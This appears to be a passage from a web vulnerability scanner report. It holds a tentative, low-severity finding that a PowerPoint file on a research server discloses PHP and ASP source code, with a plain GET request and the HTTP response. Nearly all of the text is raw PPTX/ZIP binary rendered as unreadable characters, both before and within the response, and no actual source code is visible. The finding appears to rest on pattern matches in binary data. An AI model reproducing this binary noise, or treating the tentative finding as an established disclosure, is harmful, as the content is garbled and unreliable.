.7....<....I...1?*.YPUU.i....'+....yE)...C........c....U6>....M..*(aR.2.zY.r.@...4.C-..Tn......R.!.l~.g...)9l.!.YW.4h......QVW...>..]mG.Q...wx+!5G...p..T<.eyc..:W.F...dQ?.Au.*6K.6. .....c`?k.[.T^VL.SE....@..@..@ t.ma.+gv..T..`.S...\I/.{.....G.!D....5.....d.c...J#.or)...u.i..I..>+i.....&....j'`...5fJC...ue....,.t.U.h,8/.N.%.f..L.sU......9Ik+z..l0....o.m8p..=h.`.VV..W...Q4..7.........j~....c."8;..N..9...........@X3.>.G.4.p.u5...."..e}MU.lm."e.l.....>....h.9\?...;:...3E.RT.....H..R......=..}.BF.,}..3(.$M.H;#u..0$q`.=]u..W..U.'..ZW..[.o.Ba.Cw.U......h.............mhmX....H..S.J.....8ih\......f.....o].Uv-.9........%X..!.. .. .....J.R.2.=7.C.H.:..%%....V...d.....m=@}Q^A.....0.}..Mk....h.K}KE.......W..zG.Q.F.1(.hX....eet.QMzvVVv:M+h....N%.]....Z........\}.K....#...v..)
.; e........@...............)9.r....O+6.(........|.#..4......]......lE..c..4)+)_PP.Q....{!\Lg.*$....... ..y.wHA.....(QZa/...4,...GT.:.
3.+.u.9.B&.A.q.gr.e.e.,9MI..+..v...l...|.L..].p..TT......'.v..pp....[#.p<."......Y.X.Ozh.k...    h..=.....>.........!a%..~.......@.u..J....?.c..Ai.n&..g...X......i.......G.>....\}a..T....\....n.Y..b-/`..6.Vd<..L/..2kf...A..n...LM..Gf['Y.....".I....!y..
n..$.k.BR...+c{.......H.W.2Y...W.4.V]uA..;p}..7...k...R(!.}...?XY................H.=.S..H.&.'......h.a@Wl...........=.]4|........@;    .BwU.S._q..]....~...~;.....
U'8.....&A..@..@....o. .....b.Tg..!.U    .It..E\ .. .. ..qM..f.....................@.g.N
....@..@..@..@.......8.@... .. .. .. ... .. .....@..@..@..@.......8.@... .. .. .. ... .. .....@..@..@..@.......8.@... .. .. .. ... .. .....@..@..@..@.......8.@... .. .. .. ... .. .....@..@..@..@.......8.@... .. .. .. ... .. .....@..@..@..@.......8.@... .. .. .. ... .. .....@..@..@..@.......8.@... .. .. .. ... .. .....@..@..@..@.......8.@... .. .. .. ... pJ[[.R..../.....@..@..@..@..@ F    ......\.....?1.>...................o}.[...._.    [... .. .. .. .. ...N=.T......w....@..@..@..@..@.."A.....b...+.....@..@..@..@..@ F    ....b..W_...p..@..@..@..@..@ ..N;.4..../...-.................Q...~.b.........m.....y.]v]..hAY..............
............z...&z....:K..|`...Rk..1z.......o............[........YGoz...........6N.].j.....?.?....{...................@l.HL4....7o..[._%..xK...S.}..f./..m<x.....;..>...h.....7.%.y...~0|...~...}..o..N67M;4~{...o.....u...]2gb..=.8.w....y..I..7g.z8....y...ni%.....n....w .. .. .. .. ....W.\..._%...v........m.A2d...7n....d...i.q...g6/Y.m..S&^...m.Oz......za..U..\..?/.......|..\.../.r.*....%O.Y.JZ....m..+...0........9\.9.....>.k............{..........d..&.Q.../<.(.. .. .. .. ...L@.U.p../.|IN.v.<...!:._WW..*..........$d..W.._.....K..T..:......=v..W.....k?.Wz.....A.e.........a.5.......q. 1?....|.i..oL...u......V.......:ec..
.A...........R$..hbpp.U.>{    ..K.....g.`..m...........kV@K}../.................@x.....n*N..mm....n.kd..~T~..!.........%....W'..q....P...OO8qVb2!u.T..$'N.I.'
6...J.....&......w.Y'N..w|o.A>.oTT....A?iVLs=. M.n.oe..G....q................).9.pM..<..K.....v..........7.~<..o.o.^....K.e..;x__.....'....Q....=........,i..].....I..W.....>..'.....-.g|^4p..@..@..@..@....@;..Q..q.....`x?B......'...N...<.n.....v.2yx.VJ..
65.n".'.......~..K..m<..vp.:*I5...Q\.......d..M..L....oMr$9......5.............x.....=....?_........%....[.....?.x*.I...{.......r.....Q...k.=."....._.X.....s~uY.D^.........w.~7....-.#...?-}gq5..........;.?8t..?,.o.M...?.......=......G.JN'.....)..?.`..5;.....5.bN....|...............A ..8;x..K..<..0....wB.....=..Y...i..............O..#W...E.    h....................uN.....|.....?.:..S.s...[..A....m_..5(.4...5..v|.../T.Q.B.....G.M...s.w.OG................4....qsssp.....\8.%.._..^.%..............*...$C.)..].....G.    (................\.}..k.]..}..u..... .. .. .. .. .U.}....1hll...P.. .. .. .. .. .....3..u.`.....%................D.@....g.......................t......'.{...\/a..@..@..@..@..@ ...........;.N@9..............@...4h.b.k......A..@..@..@..@...J 99.?18?...:.. .. .. .. .. ...K........u..A..@..@..@..@..:..7:..l................&.$..Y/.
.@..@..@..@..:......c .. .. .. .. ....%..7onmm...................@.    .J..o..@..@..@..@..@..b....X..... .. .. .. ...D..A..................e.H.b.v...............t..$....f@..@..@..@..@ .    D%1..b.v.2.v..k^.;..........1...bTxZ_4....!..O....Z.B..6.w............H..Jb@...:\.>...g.....-i.DX\G.s.........N.c..{w[...G.....7..j....l7.|AAzv....+T.B.)nF
"+;.`.#.. g\]..R...KA.Rh.A.v60.*..W[.W...]..D....!.@..@..@..T..&._}...S..#.`...?....?............u.G.&._^U2.:u;....t.4.]^V......<Zuae.;*.IA^H..Y.[Z..n|d..i...$.f.8;..2G.....\......2kf.!....R..).|.K....z(..u.5...PE....K..|Ai......T....H}.c.......,"_...........P...........$...g....^.M#h..t.........1. O;h...p..G.>e...g.n.k..e.".$d.;..;..j.AS1vN.O. :.&u...e..s....
g...i......3......o....[ed.A.2]F&!.....+g.si...:.`..3...PO>L..Y.Qk.|q.6...e.s....4kwS..24v.H7gV..d~..K.k.bi_...0k.jQ.)Sr....1...2.FJZVOY!.....b...#.R.2....*....CY..S.......c.*......t.........x....(....#.w......Q..[..Ly..!,...Y.{....O.w.v.......[....U..].]\<i..'V.^.../j.....=c..p+b..5..#b....G...d...,..v....g...Y.1{....Ry.j...]ULfS..gX_[-.H.........9.P=.}..[,T"..U.......%.....M. 4..w..F...L.>J]B.....<GJj.................5i..2..X+.|...'..i_....7...U..{c...5...L....t..S].rW7UF.F.
-1...U.-/...rY...O...;..@..@..@.....J....e.\>    .f.....@H....}.W....6..&1....d.3...:..i......E...'.Z#i.......aR&$.K...iLtH"..>.......N.(gv.X?\...uf(r    {..h.....<....:..[...I....)...6.`.p\....no.K0.1...nk...hw.UEn....a
..mV+zAs...%.#3..Z.R..&.....L.O.. |..V.......X..;J{,...e...kN.I...[~............@.    .Hb ..\3.T>.-.!d.1.0..K..........3..3...b....K8v)..x....ed.*d..\;....:L..}..c....[..J..;.bl;...].9TO3..t..\.....h.1A!&...JM.9.eF......4M;.5,.4.`C..i.{c...i.....J0.....l-H..+..A)..6..Z~ . .. .. .. ..@.$...n7O.$....~.....i...@...[j.r#..CoU.X....53....j.....'."I...........f.R"mD.n........t..."!.    ../..Km.+.L)..B.p...1y..d..[]..u..=.V.m..Sc!D...B.Z~m.^..R6...S.%..Fm......h.:..O...0.n.Y.S'.._..y.=...%.........t...*.7.51m.Gl.f.@..-67.8..e_FY1.U.CY.% ..y.j.....|?.... .. .. .>.h%...c..f...Q....A...^y...o.......D?}..I.kx..EyK.f...A:TE|..-.<$b...d...N}.9$..g.........b...k.{Va..-.q(...b-?..n,.&!.U..k.y..{.<.#V.H[..=.h5Kf.Z)......-&.2c1..$..X.....&+E-G..Ls....K..p'.}.l.....B.........%Hn....J..oZ`.    ..)...ZCU(.5Q7.....s..;[...0K;3...*.Y.U........U...2is..H...|....A..@..@...'pJ[[[..Q2t..?U............:...[o.B..z.m...2+...
A..@..@..b.@.f.b8.Nu...Z..;....W.......(.]..t...x..[!U@....B0.-.8..W.... ........@........'.8D....:2....@..@..@..@..:.@.'.../................(.`)...................zb@......A..@..@..@..@..b.@...X....................H...@..@..@..@..@....................`..m..@..@..@..@..@...R"U3.....
..z.......w.........D
Bp=...w.._n...vt..ZU............D ....+Fn.+w..?..]].b.XN...[.'...............@......"..:.P6....g.c.4<..............X&....W_}E....h7.#k+[.o.$[.h.<.".96.p..G.H.......']Y..m>.`.v8...g.xK.+).K.J..".v..M...qh.M...EEl9..$.kV.....bB.
2..,5.4...-........./.1...Y~>.o[.c....*.P...K.$ ..F.*[%.'L'1....e.n.P.. .. .. ...D.#...{.....F...9......l.yb............M.h....g..K.].-.*...x..Wv'.VI[..M..N...m.......e..`5UEr*[Z*.3H.4.K........vT...L..^UP..K>F;.j...Y.hKI.M.....X.NIF!-.0K.]U..X3.UiG....RU..]...".9SR.?..yi.$./............).......\.QeN...2{.....1(.u......h}Q....Lob\..Y.VM36. .. .. .. .u.D=1P..2.v...+3.
3.-5..=.g..V...&>.@.....)i.Ez}..#.I...v..;.H....l...7....9.....r.#.Qi......I.........$S....m6M.z.U..)3f.|......`E.H........Yz..    1M$7.]..t#7Q....5?.g.JkPB.6.......#..ob.].............t!.QO.b.U..1...4...<q.!.v...'}S&$....||];,....6..|...kl. .#+..+.....04D.Hp&...n4k.>..... f...........".N.. .;..(.R.xQM.n...aK=.FH.m...f...z......6..r..$......F....<V....S........C.Cd.tE.s@......TF}.c>.ad7....C).9...(..l`.L..h}Q~Q=..`Y..2>....g..k...s...v..H+H.A..@..@..@..:.@.'.|Op.*..t.*.?>.4...R....l    .<..4RU..W-o!....X8/cf_*.XG......m.t..]w....n......W.j.d.,.Y.*,%.......-.qm3\..p..^H...w.V.>
...[SNIP]...

13.4. http://research.microsoft.com/en-us/um/people/livshits/papers/ppt/w2sp10.pptx previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://research.microsoft.com
Path:	/en-us/um/people/livshits/papers/ppt/w2sp10.pptx

Issue detail

The application appears to disclose some server-side source code written in PHP and ASP.

Request

GET /en-us/um/people/livshits/papers/ppt/w2sp10.pptx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/vnd.openxmlformats-officedocument.presentationml.presentation
Last-Modified: Thu, 20 May 2010 06:49:35 GMT
Accept-Ranges: bytes
ETag: "7f64bd9be8f7ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:26 GMT
Connection: close
Content-Length: 648552

PK..........!...H.............[Content_Types].xml ...(..................................................................................................................................................
...[SNIP]...
<...3v5.o.vD....u.*u4....@{.s{.Q]...f.tL^c.w5C^M..-o.^3.Twff.....PJT...RK...w...]...$..r..T=5\.w...d$+.`..x._......@a..Q6I3x.".3.6@.|........f.1I...~M.M..<%.'N...7I\...'=9..9...y..c(....''. s....7....8....O.9....F7..v.....K........>..=|.g......S...y...C..A...`H..J.83.ul..H"(...fh*..]V....)..n....=..:2:......a.]..a..(...5].].:......K. 3.....*..
.......bf    ./..x...U....w.......u..f3........7*t........aU.T1f..e._Lx.....t..V.]=.m.    ..^..S.p8..N..$.y'.y....2..6....M..:....b.L.|Ne9....b.DW>.$......T,......i.C..T,..
(.3(...A.i*.P..J........b.eW@....M.c...4u.%q:4iSA......b....56........PK..........!...v]............ppt/slides/slide6.xml.W.n.8.}_`.A....%Y.-.Ia.vQ.i.&..Z.#...%);......d.NS....n."..!g....W.....S.*...`...e9/*vw.~..xs.Q.........*.............J..[j-..X.%m..qA..v\6D....... ........T........]......2.    ..&./We%. .._".!.s+..7.".U]..+.(f.....J^S..+...L..<.7..4y...qI.5.........=]h-.m..2K...l...
#.i..7V......0_%n%.f..o........_K.*.R.a....q..o.?..a0>;~7H"..N6..H
.;.....`...I..v.n2?.........wv.......F.N.....:...........}....a.z..;....A.........,...~_.h.1.W..5.._...(....!)<.,Z.w.6.=^.....5...B$.'$.S..^.y.n\.....sT.....bo`}y..M.:.....uE..w.... .\...V8e.5....wt..k........7{4....
..o.-..uMrZ...x.Ox....`./...-..J.(....'.d-..;..    ....*.L.ko./C/
g.....[l.M.N......=J....u....~...4.9..G...~.K?.....&...<...;X.......*?...p.5.J.lY^..a...?......P ......M.Va.*.....O.`...]..3
.Q0.M.oq....>..#... ._IR.., ..Y....%h.;........)...Q.G....)*.{.u%6U]....#S
....m.Z7...).OGe....p...$\z........E......E~4.. .jN.Q.*
.H....
..    ..3..z...t.Y.q2.....d._...=...=...`vKY..m.A..J...
..JK...L...~....`....!,..+^..    X.:.,...<..4.`.b.`.........)..&Q.....;H.R.7.7...Nx......>..-F2....%O....z..G .x..V.."/....j....X.....*@BF..x{........c.....6.e....;.....W.....n..........`....2.?..g...".......k...$v.3...5.....h@t_...0.c#.`~..Q...d..F8..$..|....q..T....s........u.-.X..S{m~..2.F`(..UX...tOk.6r..H.....2..2.j\.Un9..X./1....VjT..>..p..e..~.......Y.f-74...
[.w    m.L.0./.e.m.h.../...L'Q.-..l.6."./H...x;.v.|Y>..@...m.PD.GRZ0.L.d....kw....p......"...:.]2.[P....b.al=mA T...hfI..@p..n....-....tW.J.....%...ZQ>3d....i>r..wZI...mF.u............PK..........!.
.._.....
......ppt/slides/slide14.xml.V.n.7.}/. ....6.Dn..e...6.....>S\JK....km....|X......Fn.(A_.B...93....NIRp....h.l....I..L...,~...T.T..'Q.}tv..7'6.2%..}B'Q.`.~...+....5...S...m...w..d4...WT...wO.7..`...\q5....z.3a}...S..u....(..+!....=L1.r..&.X    ..7k.:..,)...b...6..$...je.......N.r.>l%....).....
...)...2oo........]....o..#"..FDS..E.f...~5..G......&..S.'4A..n.a}...J4.; .^d..,{.G.e.{.......h.....pFm8K....}T.(E.+...h.q.....M.....................GN+.`...e.|..j.&...J.+B.m. 8>.~I.!.:.]D$..*..W0...qkh..[..pg.d%y...z\a.;~v.$...A.:.SG.>j .L.t..h]......}.2;5....\R.3#S...0.E.U......:. ,.L....;..|U..#0[........[_...
.L.t.}..;..xp.T...b...x{pz.J(..&...........Q..\..p..6.S.....YX'4....Qe\..2.6..y..b..L.B.,e..k....< .]....w|E..R.zHv.=.......@.C.X.@pO..m    ..e.m\...5.@...@0..e.Y.6.G_.3....."..&W+l.o...k......B...}...#..E8.C...o5...:h:..............2..........x0.....l|y|4....G...!r....m..u=1.......M..G../c..^.=.?.......7E.....|M.%......."...........PK..........!...hr.....
......ppt/slides/slide15.xml.Vmo.6..>`.........B. ~.
t....g..#...HJ.;...HI...i.l..."...=w.....(P...J..{...I.2..R.q..F.YGdF
%Y........\.....mi....9....9...).$.........3C..*.......p..}..}..q.....IW..V.....k..    ..8A..RGT    .[^pw...0U.K#...Hpj.U;.u.AhR..#A.wwR..-..Q...a...];g..t......[..B.A.....6..........._..w..ze..M.2.g.R.$.`....F,|J..E...].D.....%I.~tH1......I..!Zo..].xB...'.......R.U..cwz.;..
...^...T.+.."..O.~....Z0....9rG.8.......V....,w........$Ia........I.......?"&..k.2n\..Y.f.#.....d.W...M.....FCV_.=...`2...!..........[caY..}N.-.3%.d.Z...\..3..6.y....._ ...|KoMH`...G.>....~..C|.\...Y.).8..}.:.Li.^....N.}bux..t...&.>../$.#.hi.d..TP.-.D.=C...g...W[.s.<h.y].    ...[.....[6.....@C_...?Kb.3.j.O..ZB...
......W_...-...p....i/........D...r...;.N.+nj...K..."......W...!...g...*..M...;..P.t...-..t:>..F.h..,..||.n.....?.....Y..l..AB...];f....y....+....k.gF+...n.d.x[..O..7.O..QE.......h4._4..".........ha. .C...Ll.....aF......h'\.....MT5.e...v..J......K..F0.8x.)..fLx.*c....[.\cg@...h.j..%...........PK..........!.f._i...........ppt/slides/slide4.xml.W.n.8.}_`......%Y.e!Na+vQ...N?.....DrI......!%9...Z.......r.....]S.=..K1...( L....v.|.^.Y@......l...    .\.....M]...&..`k....SnYC..TL`o#uC-..vPiz....$Q4.4....._s_n6.d...5L.V.f5...l.2...|.....;...Q.q.kn.^.I.~....;....Z....N..2.7u@.2w+..75......f..=.[....2....z..5.*'DXo.#.].......Q..17...Z.......W..
!..T...Fw.O..a0xr...D...n..i....Y.|../....YR....j......v......hpz.Y.Z....7......dU{...{Y~5DH...o.+?.{a.f'^m.=*x.:Q..v...?o.S.,{.....~..H....=..;.j........%....u@*....1.-jF.n....'.4%.$`......9<c..N........R..4..P.........?.x.........p#W5-.V...$......u    .    R.\)d....D<..'.G..-\..F..>..I.........A.Ngo........D...a..~W%.[."......N.Y.-..Q4M.a1..0.&.p>M'.$ZN.(.."....q.......T...8}..'*8...Zb....G......?...$l.    ....0p..{............r.....3..b.....G.A.A.....$I6...~..d.b.s.oz.J.l8...qT..&.2..ti9........2.e...[.\..b...@..rcx...(~.zPC!.%..Y...j.t..v..8.P.A&.*#mP.]-.V....h../.E...d.N.U..W.*]NG.2....-.g..v........,.X+.'/..n.@_?%..c3.cs../...=
.q..SI.........M.../p.t2...R.+s.,..)*.CX2...c.....o.l.....v.=..+u.vG..B::k.kaO.}.!.M. ..W@......]7j....In...xmMr..cg.O.S.....3.u.z.kX...4..4M....I4t.3..1.....x.?Q.'..).7<=.(...\.XL.I.-.E....r:....p5..i....p..^..Q.|o..oc..:.W..........O.l.eq4.t...x..#...}iY..T}.......V.%.=..p...6.'[.+88..2$^....v.D.....n]>0|.hd.`...-..].=].YJ...%A.N..u.9@..........PK..........!.........~.......ppt/slides/slide3.xml.X.n.8.}_`.A....%Y...S..U..%.S.....(%...$....!%.q........x.r.......m..=.-.......E.\....._.2'..V.. \.tf...~{...gM......M....j....KZ...hh.....Q....B..H...w...".....%..v.r........H......5. .._"."...qrQ5..a..;#. f?.w.Nz....R.b...."y...mUy.....l8.S.M...-.{:WJ..N.V.%......Bje.<.Z[......@!_.B.....T...;....i.?./..
`k[5.pF{.....g.ih..,..$..v+..3....V.n.._,"    .UV.u.........\=1{4l...6.Zu.=V....b.S.;h.M%X.A..Z...S.........Z|SZ...e.......=..-lj..n.....o.o:I.[.Vw.....$.p.....h...em[.....j+.rJ.w.......Q.....n.wR.....Q...H...Hr..\.'Ip..~8)..).7h0.t.YA.O.jC.u.INK.....ac..D.T....wD**m.'..._..[p.v..l.e...Y...    .0vb7..y.f.*..+..a...Z...{..Gpu.....1..z.3(......._..a........NR.........u.?.z.Z....mh.:...$.....=........C.1@......q...mK&.......7..K|h..._.$.>~4w.._8..M..W.<.B'tWa....z......]K.........1......G]......sOR./2q..^7.b6..[{.{R.........K..qhe~    .0..*IU^..-p..1.0..9..    .....(
P'.)a@~.&<....M..&~..m..iL....a0.......fw<0$.8.l.;**K7.O8.....N}D.S..k...l....(.....B...@..2v.U...P.t..\.5e..4...r.L.%x....%+@.z..n.l....X...;..).h.e..$.Q.tDt2stj....<.F.....k..N6.B'.....n..^...n.............b...x.O..:u..l$.....Y5.#D...:......".w.{(kd.Fy.M.    ........W........t....b. .W&...@..h.J.)...K.\...UM..I.....uf.a..E.5..\...B}e.\.D...j.....cxo..b?..0>.{..z..^.e2C........x....3....9,@.~.-...dN..C..t.d.q...h..W....y...s.....|Y....*......Sh .^..Q_.......P.n.9..I.y............i@.rL=N..z.1.&...V...g.LK...>._.....'.ft5yI....#f6...$Q..-.//V..3.....t..;M.=...X..2......q".+.......<^^F'..F}E<..$.}.P=v%..Up<.Rm...B..p..zx61:...[V#...(..$X..x:...%.U..P]
..80......[.vh..|./.......PK..........!..*v"....,2......ppt/slides/slide5.xml.Z.n.8.}_`.A...j.nIhg.k#.l&.d....X.n-1.d...{HI..wz......CLId...s.(.._..BZ....j&k.TY.UZgyu;..N.G.:F...uEg.#.._...........U....`..&..]..t...Vx6...0\....%.!.,&.......<.ow._..yJ.:./i.z!--....E.t..2.E\I...FI................m.[R.<m...3>.+I.-.B...;......PO..w.[..vI}.......?..1.nvYa..TLl..........o.\...V...6W.e+._,/[).`RY.H.......M\V.......Q....my..xP..0.....?...>0).o........M...zO.    ....|W.........YA%m...+.._............^,Ga|.\|...c..0.j..?....w..P.{....o...\..`...g.<g....UJ...*.....E...cA...E.    .-LU..8Z)._.R..L.S.J.........Wx.i...WRD.;V7R....p..M.[8.g.........IK..8....."l|.%...^6.9....3*]..7X.eAR....m....:j/..h .<.........2|....{.Mh..s......$.....Ht.........I...k....).....WX...s.o..w%n.km#..G.`.....%."O....!.e..s....
....'..W.z.....i^...Q.RV@.........w6.?...yd..>..%..M1.'T.......0.M...s..L....1..z.JWD.    D=.........s.94.I.9...$...Q.....3Yw.....k.@....G#...f..m.>..."z........N.'"............mA..>J.|.{....#...Wg.YN d@.-..n0Gv[n9._'%..#...2..=...Z..E...oH.p.D.zi.....(G..Jo....`...4`4.&........43Q.....lKI,.4...C#....Td.......5...uM...... 6fki...4.-E.G..H..[2cN.......y...*Y5pfC0....1....?.UF.y.3
W...[6.+...._g...t..u.8.z."/..QjG.Ii]!{h..........Qz......oM.....W....x.r..</.Q<U..;.....j2)C~."..\...=....,@........d.?.n..H..y....... ...EB......>.D...H.y.3.U.5..yz...4.-.t=.j.a....6....nc.6..`c9..kf..z].Q......\.2.kx&5.V...?&.h.O....Z.6U...H..Hq}7P.34....(...b.....n.......u..hp........e..;......1..f...{]....y$.RV......W/...7..ZRu9?.r.....g..d...8..`$e.NV.KO......V...i.
...<~.......!B.p..t..-...w.Yv..3.Y...9h`...'c...}+QU%.M_1C.W. ..]7.@.?....p.=....L.....z.=l.\C....=g.7...2.....m.HpLv.7R....'Pu%04K...vT....    .........G...r.w.....]..#z".x.~x..ZCZqZ.H4-..DO=.A...(.i...Dqd9A`... .....    ..... ..........S......q......84..p.+...2.C..........r...qDe...#GO../..8z..\..z.H.....#z......D..A`E.......S]qb-Tt.........!.$a....../AlGO$ho..w..............)..........(.m[.....~....lp 8...}.q..i ..5...=.W|;z...@
........_... ,uj....Lq.TLM....-..}[..j..........c......sDe.K.[..@....x..9.3'.G..g..;........k..w2...M;......%...8.2...sU.p..~...sLgN..$J.0H8.b.....N...TJB#.-.....9..%...8.2...a......Z.|^&D.l&..%.!).k.TQm.*.A1
S..c...@5M_..Tj....&...='y"....j...U..M1.G.../.]...K.x.
:...W......?\Ec.....@s.%.....f.>.KE.........PK..........!..Sk.l...B......ppt/slides/slide13.xml.W[O#7.}...`.c.!...#.".T+.,"A..3.0..Km...ZiH.....x..@.%.}I&c....w;9<...)..\.a..i...X%\.....$...:*..)........._.ud.........s:j.l.2A...Lbm....?.M+1t    T.....^KP....y.y.X....8.L.
...:XnS.m.&...    jns..Jh@.y....}.).AndT..
..e...3..qT., ".>.He.<.=.(.\.f.)..s..s.._.~k..k,..D...5..@~<...m..0..d...S}i....... ...T...U/........zr..A......C..~r7...+..C4bw......m.~..7N.6.n5....K.W.G...6......<xUm.8z..[K.........h....^...4.q...W-.|4.-8-.rw#....s|./i.Y7u.....l.....?........I.q%G.
7..E..4....0r.2.b. ..........O/.D..B.,..b[.6`MQ.^..*&.Kj...d....."".x....,.m.d..C....,UY..../gx..o.j.t..D..'.S..*..L.K?%.........iC.t.-J....}{-rUL....G..jR..}1........HW.[.0.V.4..I.d."7
.........2.....>....L?.......0..r........91L...Xsj.....'...$..F.^2t/..,!..qH......f....s:%..9...=|..$..'.....e,..K.R0.b....oU.l..zMG.f<a.".s........T.2h2@c(....rj@V...;V......_...    .......xr....g.i{.{.....=..'...wv.o..;_.z.Z...u.....TM]?.;...........qQN.F+A..[.Z]J..9.2...u..Q8..&a..`.n...I.....'.../.]wzQ.....C......{.....*...
.........d..T........:IA.h.....`0.u."P&a.    ....qf>R..(K.&.....F...c..........d.UMq..f...I...e..\r...7...7...9.N..Y%...R...D..5....#..._.......PK..........!.X.......%.......ppt/slides/slide12.xml.X]o.6.}.....q.bI.-K.S..].h. I.gZ.c...E;N....KZ.J.ei..&.MK.%.=..^...M....MV.C.=s,&..J..vh}.....5..)..R..{.X....U.5y.0.l">..J.Q..$KQ....E.w.J.\........j.w<..w
...v.|..j...1..U!Je.H.s..7..nZkE..s...V..TE..,...6.3..Z+YF[.."Kd.T.Ec..'...-V$.....|.#<.Z?....r-FJ.l.R..W.....9+..H...GQ;G...<.....BP.\...u}).....dY
H-V..K.:...n.g.nhtN....x.Y......~..Z..=}b...F..<L.O...G.&..#.;..X.nR..x....u.&S.`..+..c..*........q/.X...g2_/.....E....K......`...J...9.....|1Z.j.)...U..ku...*8.#=B..........bi&...k
...c#n.....^.p..t..#vQ}...Y..W`..9..Y[.ez.%.zr..J,.>...i".t..6..y.
v.*.B...'bY.).....4..!9..._+....h............E{..x6qg....8c... .Cg...Y<..a..:..kK..</.:.i..`gXC....$LM.......Ybv.e....~......LG.2..0.y..'[..$^..b.."QF,.GRVwK.SH..&..}...>......Y=...<.6.....|.z:...wxlDe%3..F..zc;.9..;....~`..4....n..F.~.j...........Tv..g....(mb....QZ.6..!...3-..[.|./P..]kG.~.0.D84J
.,...vW .....dc.,I.....}.BS94Q.{.?.^.........i..S....>u........hf...<..z#..Q.....L|.mw...-...zF    ...p6.O.b.#f.^..*.N8.L.>4.?..'........7.N.x...uPq...    ..'.....D... ..4.JK..4..I...h.Q..q.[..=.....]......?.l...0p....c0.......wY)~".5....
{^._.S.G`.Q.!..<+....?..<.,3-S.V<.M..eB.q.G...........w..=..b{...~0.............k@...."..p.......*.n..z8Y.t.Z^`.d<.E..(.l.Rfjy..T`;.0t6.o............P`....&yi...+UDh..."..B6h+..h....>.PWJT.3....4O...k..w...s.......mj...o.M.D....Iw......B.....^..v.....I..I.B..jZ................].V..qe_......*z............'....#V~;2..t...sZ.Q+1(Y..Z.....j.>...........<.ev[.............f..0U.B.r.............uH[...5......c{..3......~..........;...F..H.o^...\x...D].    YW......).A........u..r.H....*..{^Xk..}!...><.qCh......
. .V..|.=.`X.).k.t.....EV....    .\Jd.R..........)..Ji..Z"6....NG..y.........PK..........!....*....*.......ppt/slides/slide11.xml.W.N#7....w...j.?....@vW.e#..JU/...X.j;!a......@..'.g...~v#B..$3c..9.9.....Bdd...Jv..V-"L&*......*......fJ.n.d6:....=..,%X-mL...9.W.6.2A...Lbl.........z.T.U...vUP..b.Yg..Lx..T2.L.....:Xn.\..M$..    j.g..(..1..w..z.3.F3#......QVM._....s.ED$......g.G....a..9;t....1..._Jl.....H..\am..'.,..V.......3z..&.......!.....E.b...^%....h.E.D.....=..~..F....."...#I.1...L??37..?3.Zn...6.^..=u.Q.s.].H...|*...*..D*.....KN.%.....)qKf..*.....r....,...t...........3.&.....e...2c.*8D... 0.......(")7..G.p..Q...`...B....    ....u}.w..'..e~O.v..L.Cj.....V...X:.....yo....t.J2.h..*K.!....S.P...[.J.-.d..&V...EFp>.`....K.. nJ.>+..gI...S.....m`...8.|1b........."9.X.@".,{m..WWd..U    .....NgjY....Jn.AD8ow.<X.....
..5..tJQ/...f....Z.......&.TE...ez...C=...E.r..W%QI2.S.R"..........3..Hf./P...]G.&..f........u..+....[..T3C4...q?...../_no.y.........G.$.<.T..9;.`,.M^+7..l...B=.!.+.d............?,....e.Y.......F".3..........Y_O..J...    ...._......>...z.J....tj.V.p....;..q..-*....KX.$.c!........z.>!.._.B.....eJM....B.. Ug...^......*.zkPi.uv..v.2h7[.~o...<...u..'..k.C......~..l.1..mJU.+f...S..V......3m.... s.....nl.w...BO#.!    .H <e..d......R.~

...'u.#...S.V......ET5.bL;.e...p.s..    ......r8..HB...H...\..S.\ag@....*..#N..........PK..........!.e..(...........ppt/slides/slide7.xml.W]o.6.}... .q...._B.....@..M.<..ms.H....C...).N.v...i.....%.=..{...]S.G..b...I.0Ae..n.~.]G.00....R.Yx.L.....^...U....d...UE...g1.R1.......wq..'Xm.8K.Q......~.y..r.....&lkD..X....2...>.\C.....l.Llx...7z2s...-.....TK#...).B.cS.AC..;!5...Os.3.....ln....e.-.....s^...a.._E....7u.>......8...F]k.|u.....i....ia.-t..W.m.....zK.......)...n...../.........<K......W........K.W.GO..zwn..Y...j...}#.G..    ?...{....s>;.j..{..Xg.....x..b..e....w.o......7...[n.E..jco.}.|...).    `j.........,...D....8...e..R....,.W& ....t.....Jo....h.......Ep..    .6...}..............&..e]a<.'....t....D[.C0.4K......S(../....e...W.2YdQ....4Y..|]...t....K.1.8..^..|......q0..h.fw.;x.%6..6/.9}........h.L...gm..rwa.f.q:.*N. e..K+M|..X...f.S.I..,.i%.X2....7.;a.=..x...C..{p...b..*.Oi.w.H.M|..'...g..S.O{75Wk^...n......U..2..4..A..ju...g.y.L.ET..2...*.O.q4NV.<.'i.._..4/...9R/...].?..Sq..mKU_...4.......+E..K8.Kp$u'WP&..kS.~.....`4}.R..tt.t...............)d...[YA.    .....H..0..#_.R(+..Ht.X.........|..#.]..7.....l.7...b.9.N].v[.e!...K.0n.LW..$...V`.r..&.F.t<\..e.........D....p...A8.v#.........n...?.........%.........zB...t..h..<.o}.(.V.B.XLGY9YD.4_G.r:.mF.h=..y.......F.6...z..}W........V.....#U..t.e.A6.*L.Y>.=^}.Mk...wG.G...4%`...J.#.:....U..XW.....8.al..}_^.P......nY....hxf.`.....*w....{)m.No    7v.....C.O........PK..........!.>.T.............ppt/slides/slide8.xml.X.n.6....?.Z..4.d.z`..-[......f.HtLT.R...(..i._.CR..pROg..d.0.yI.{...|...*....7..r_8.au.....Z..2;.H'i]......e.....o^.IW......Sk-e..F].f..^4-..m...J.+.F....Z.#.q&.......c.7......7...1"XI%v..y.....s..?mZ;o..&.y...6.3..Z.Q'.........Ts.....*-R.........{...9..cb.fR
~...S......1;l..Z.....    ..........1...?...=...... .@H-R.
[.F..~....04F.._.hr....K....fj....7&...H...|..........F........T.D.......d...........H......x...`L.Y.o.D....T..q....0..O.....)n../.Ww......-.v..M.../...*.Xm8.H...>"]%..Q.[.Fy.....2.%$....c$.2X.t.oyQ.A.o..3..
..S*...gT>.    ..G.^C.......).....&C..Yn.#.....X...(#....f..e.4....h......;x.-......1w...{Y.6.e.Q.6.    ....M..<Ku#+.t......S.W/.9N...4pR.w..=.....e.;~..n.......c8.-.-.........^..F........=..<..Oh.3/.....O".n.......,..N
